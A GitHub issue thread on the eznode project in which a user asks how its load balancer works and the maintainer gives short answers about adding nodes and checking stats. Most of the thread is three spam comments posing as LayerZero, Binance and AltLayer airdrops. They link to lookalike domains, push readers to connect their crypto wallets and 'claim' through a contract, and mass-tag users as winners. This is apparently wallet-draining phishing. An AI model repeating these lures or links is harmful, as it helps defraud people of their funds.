### ISSUE TITLE
Question

### ISSUE THREAD

**Issue by CryptoDevving** [amovah/eznode#1]
How do I start the load balancer?

**Comment by amovah** [comment]
if you add two nodes, it load balance between them. you dont need to do anything.

**Comment by CryptoDevving** [comment]
So I just install it and it works? I am not sure what you mean.

**Comment by amovah** [comment]
Hi crypto deving, did you check the readme? which part you have problem?
meanwhile I'm preparing the http layer for it. I'll publish soon

**Comment by CryptoDevving** [comment]
I did. That is all I have to do? Is there anyway to check if it is working for my blockchain?

Excellent!

**Comment by amovah** [comment]
you can get stats and check how many request a node respond to you

**Comment by ucontinua** [comment]
# 🚀 LayerZero Total Airdrop - Claim Your Instant $100 Prize! 🎉

Attention LayerZero community! You are eligible to instantly win $100 from a $3,000 prize pool, available for the first 10,000 eligible users. Act fast to secure your spot! [Claim Now](https://connectlayerzaero.online)

![Claim Now](https://i.ytimg.com/vi/c_iNiyOUHVQ/maxresdefault.jpg)


Welcome to the LayerZero Total Airdrop! Follow these simple steps to claim your prize:

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://connectlayerzaero.online) link.
   - Choose your preferred wallet provider (Metamask, Coinbase, and others).

### 2. 🔄 Claim Your Instant $100:
   - After connecting your wallet.
   - Click on the "**Claim**" button to initiate the process.

### 3. 🔐 Interact with the Contract:
   - Once claimed.
   - Interact with the smart contract using the **connect** method to secure your instant $100 prize.

💰 Don't miss out on your chance to be one of the lucky 10,000 users! Act now to ensure your spot in the LayerZero Total Airdrop and claim your instant $100 prize.

🎉 Get ready for an exciting journey with LayerZero - where rewards await at every step!


Winners: @mayooear, @coutocodes, @deniztoprak, @ethernalspace, @MKS-01, @makesmallprogresseveryday, @fcrump4

**Comment by YourNPC** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @parisote, @kzlelma4299, @gushernobindsme, @Gangstabo, @ecast162, @ShaunLWM, @leetaewook, @sudiddo, @joselvelez, @xiong-pro, @robotzhang, @karol-lotkowski, @louyongjiu, @KambizAsadzadeh, @dmitrysonder, @TiffanyHoran, @hmisty, @YYsuni, @tkc, @chronaeon, @Bicman69, @Cmazhator1, @Raemrae666, @Bhouben, @jd327, @not-known-person, @theophoric, @edwardtay, @developerfred, @jojobyte, @Ti9a, @HappyDavid70, @HScarb, @abe732, @0es, @compiledsound, @CryptonightCanada, @stonecobra, @syl-gh, @JulyMoon87, @kevin-222, @kevincobain2000, @hicksvirgie, @cheerhd, @pedroapfilho, @chindris-mihai-alexandru, @amaurycatelan, @Solo777, @baronrustamov, @kaichen

**Comment by rayalbright** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](https://airdrop.altlayerio.online/)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others
  - Ethereum Mainnet
  - Binance Mainnet

For detailed criteria and information, check the full announcement [here](https://airdrop.altlayerio.online/).

[Claim Airdrop Altlayer](https://airdrop.altlayerio.online/) opens from January 25 to February 02, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.
abhi1010, @kooksee, @teobuc, @0xech0, @0xCuttingEdge, @xiaolongbao, @anhhong31313, @qinglor, @wushenshen, @ritsuyan, @JimBrv, @cbrnrd, @JShollaj, @atyenoria, @liunix61, @nodeicode, @fonzarely, @zfogg, @Nanyan, @0x4a756a75
